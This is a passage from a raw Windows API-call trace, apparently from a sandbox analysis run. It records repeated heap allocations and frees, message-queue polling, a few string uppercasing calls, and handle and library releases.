lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.442] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0200.442] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.442] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.443] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.443] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.444] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.444] FreeLibrary (hLibModule=0x74d40000) returned 1 [0200.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.445] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.445] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.445] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.447] CloseHandle (hObject=0x1f8) returned 1 [0200.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.452] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0200.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.454] CloseHandle (hObject=0x268) returned 1 [0200.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0200.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.467] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0200.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0200.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0200.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0200.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0200.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0200.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0200.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0200.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) 